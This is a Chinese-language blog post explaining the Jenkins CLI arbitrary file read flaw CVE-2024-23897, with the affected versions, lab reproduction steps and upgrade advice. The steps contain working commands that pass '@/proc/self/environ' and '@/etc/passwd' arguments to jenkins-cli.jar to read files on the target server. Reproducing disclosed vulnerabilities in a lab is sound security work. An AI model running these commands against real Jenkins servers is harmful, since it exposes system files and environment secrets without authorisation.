Jenkins 任意文件读取(CVE-2024-23897)修复及复现

Jenkins任意文件读取漏洞CVE-2024-23897修复及复现

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞详情

Jenkins 有一个内置的命令行界面(CLI),可从脚本或 shell 环境访问 Jenkins。处理 CLI 命令时, Jenkins 使用args4j库解析 Jenkins 控制器上的命令参数和选项。

近日,Jenkins 处理 CLI 命令的命令解析器中的 expandAtFile 功能存在任意文件读取漏洞,未经身份认证的远程攻击者利用该漏洞可以读取部分文件的有限行内容,攻击者经过身份验证或目标 Jenkins 更改了默认 "Security" 配置可以通过该漏洞读取任意文件,攻击者进一步利用该漏洞并结合其他功能可能导致任意代码执行。

影响范围

Jenkins 版本<= 2.441

Jenkins 版本<= LTS 2.426.2

漏洞复现

1、访问http://靶场IP:8080 显示Jenkins页面

2、下载官方提供的命令行客户端

bash 复制代码
wget http://IP:8080/jnlpJars/jenkins-cli.jar

3、使用该工具读取目标服务器的/proc/self/environ文件

bash 复制代码
java -jar jenkins-cli.jar -s http://IP:8080/ -http help 1 "@/proc/self/environ"

4、使用该工具读取目标服务器的/etc/passwd文件

bash 复制代码
java -jar jenkins-cli.jar -s http://IP:8080/ who-am-i @/etc/passwd

5、java不兼容

如出现下图情况为java版本不兼容,卸载本机旧java,然后安装新版兼容的java版本即可。

修复建议

升级至安全版本

参考链接:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314

官网下载:https://www.jenkins.io/download/

相关推荐
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全